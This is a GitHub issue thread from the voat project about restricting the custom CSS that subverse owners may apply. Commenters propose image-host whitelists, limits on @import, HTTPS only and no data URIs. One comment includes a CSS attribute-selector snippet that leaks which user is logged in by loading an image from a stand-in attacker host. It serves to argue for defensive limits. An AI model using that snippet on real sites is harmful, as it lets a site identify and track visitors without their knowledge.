### ISSUE TITLE
Implement custom subverse style validation

### ISSUE THREAD

**Issue by voat** [voat/voat#351]
At the moment, sub owners have full freedom to customize their subs through CSS. This can be abused in many ways and we'll have to develop a safe alternative. A wizard-like interface could be developed to allow only a certain degree of customization without requiring any CSS knowledge.

Temporary solution would be to prevent injection of external content (use only whitelisted image hosts or voat cdn) and making sure no javascript gets through.

Thoughts?

**Comment by talons1337** [comment]
>At the moment, sub owners have full freedom to customize their subs through CSS. This can be abused in many ways and we'll have to develop a safe alternative. A wizard-like interface could be developed to allow only a certain degree of customization without requiring any CSS knowledge.

This is a bad idea because it severely, severely limits the capabilities of CSS on voat

>Temporary solution would be to prevent injection of external content (use only whitelisted image hosts or voat cdn) and making sure no javascript gets through.

I don't think it's possible to let JS through via CSS. It's possible to get data from users - their IP address and stuff - if you have a server.

>Thoughts?

I have posted more thoughts in issue #325

**Comment by talons1337** [comment]
With that being said, I've already seen one case of abuse and agree that something has to be done about it. Part 3 of my post in issue #325 has a potential solution.

**Comment by jksg** [comment]
What kind of abuse?

Currently I can extract information by attribute selectors. Simplified example:

~~~
.logged-in .user a[href^="/user/atko"] {
    background-image: url(http://badwebsite.com/atko)
}
~~~

:) 

----

I think Voat should

1. Make sure no JavaScript gets through;
2. Allow only whitelisted image hosts (Imgur et al),
    1. which strictly means no hosts that allow non-image file types like former Pomf or Pomf clones,
3. Disallow `@import`, or allow it only for whitelisted webfont providers (Google, Adobe, Typekit etc);
4. Enforce the use of HTTPS URLs for 2. and 3.;
5. If paranoid also disallow data URIs like `url(data:image/png;base64,…`.

The wizard is a good idea to let users customise their sub without CSS knowledge, but I hope it will be optional.

**Comment by talons1337** [comment]
The abuse in question was someone had parked a bunch of subs and used CSS to completely replace the sub with a giant cover page. The page itself was really flashy (in the negative sense like those annoying flashy advertisements), and clicking on anything would take you to a really shady site.

**Comment by PuttItOut** [comment]
Closed as this is not a planned feature.
